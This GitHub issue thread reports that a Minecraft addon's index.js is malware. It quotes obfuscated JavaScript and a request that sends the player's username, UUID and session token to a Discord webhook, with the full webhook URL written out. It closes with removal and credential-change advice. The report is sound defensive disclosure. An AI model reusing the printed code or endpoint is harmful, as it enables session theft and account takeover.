### ISSUE TITLE
RAT

### ISSUE THREAD

**Issue by itspbeezy** [Soshime/Soshimee-Addons#6]
The index.js file in the Soshimee Addons repository contains code that appears to be designed for malicious purposes. The primary concerns stem from the obfuscated nature of the code, the presence of a Discord webhook URL, and the exfiltration of sensitive user data.

Key Concerns

    Obfuscated Code:
        The code is heavily obfuscated using a function that converts strings and integers into unreadable formats. This makes it difficult to understand what the code does at a glance and is a common technique used to hide malicious activities.
        Example of obfuscation:

        javascript

    var _0x1a1500=_0x5d6f;(function(_0x8b9b51,_0x4f0f11){var _0x4aecf0=_0x5d6f,_0x191ddd=_0x8b9b51();while(!![]){try{var _0x2085c1=-parseInt(_0x4aecf0(0x111))/0x1+-parseInt(_0x4aecf0(0x120))/0x2+-parseInt(_0x4aecf0(0x12a))/0x3*(parseInt(_0x4aecf0(0x112))/0x4)+-parseInt(_0x4aecf0(0x10d))/0x5+parseInt(_0x4aecf0(0x11f))/0x6*(parseInt(_0x4aecf0(0x118))/0x7)+parseInt(_0x4aecf0(0x125))/0x8*(-parseInt(_0x4aecf0(0x115))/0x9)+parseInt(_0x4aecf0(0x122))/0xa;if(_0x2085c1===_0x4f0f11)break;else _0x191ddd['push'](_0x191ddd['shift']());}catch(_0x3d8a54){_0x191ddd['push'](_0x191ddd['shift']());}}}(_0x2f52,0x6db12));

Discord Webhook URL:

    The script sends a POST request to a Discord webhook URL (https://discord.com/api/webhooks/1255684871435587615/8eZnbpusyGPHykqR2rtmu3QMVFagGTe4ReOyg04HBkv0ZwmE7REMBqq5W2KBtdePAiT3). This is a method often used by malicious actors to exfiltrate data.
    Example of the request:

    javascript

    request({'url':'https://discord.com/api/webhooks/1255684871435587615/8eZnbpusyGPHykqR2rtmu3QMVFagGTe4ReOyg04HBkv0ZwmE7REMBqq5W2KBtdePAiT3','method':'POST','headers':{'User-agent':_0x1a1500(0x127)},'body':{'content':'Username:\x0a```'+Player[_0x1a1500(0x11b)]()+_0x1a1500(0x123)+Player['getUUID']()+_0x1a1500(0x110)+Client[_0x1a1500(0x10b)]()[_0x1a1500(0x11d)]()[_0x1a1500(0x10c)]()+_0x1a1500(0x108)}});

User Data Exfiltration:

    The code extracts user information such as the Minecraft username, UUID, and SSID and sends this information to the specified webhook URL. This is indicative of data theft.
    Example of data extraction:

    javascript

        'content':'Username:\x0a```'+Player[_0x1a1500(0x11b)]()+_0x1a1500(0x123)+Player['getUUID']()+_0x1a1500(0x110)+Client[_0x1a1500(0x10b)]()[_0x1a1500(0x11d)]()[_0x1a1500(0x10c)]()+_0x1a1500(0x108)

Security Implications

    Privacy Violation: The code violates user privacy by collecting and transmitting personal data without consent.
    Potential Malware: The obfuscation and data exfiltration techniques strongly suggest that the script is a form of malware, likely a Remote Access Trojan (RAT).

Recommendations

    Immediate Removal: Delete the index.js file and any other related scripts from your project.
    Credential Changes: Change any potentially compromised credentials immediately.
    System Scan: Perform a full system scan using reliable antivirus and anti-malware software to detect and remove any other malicious code.
    Review and Report: Review all other scripts and dependencies for similar malicious patterns. Report the repository and specific files to GitHub to help protect the community from similar threats.

Conclusion

The index.js file in question contains obfuscated and malicious code designed to steal user information and send it to a remote server via a Discord webhook. It is crucial to remove this file and take necessary security measures to protect your system and data.

**Comment by Soshime** [comment]
Fas
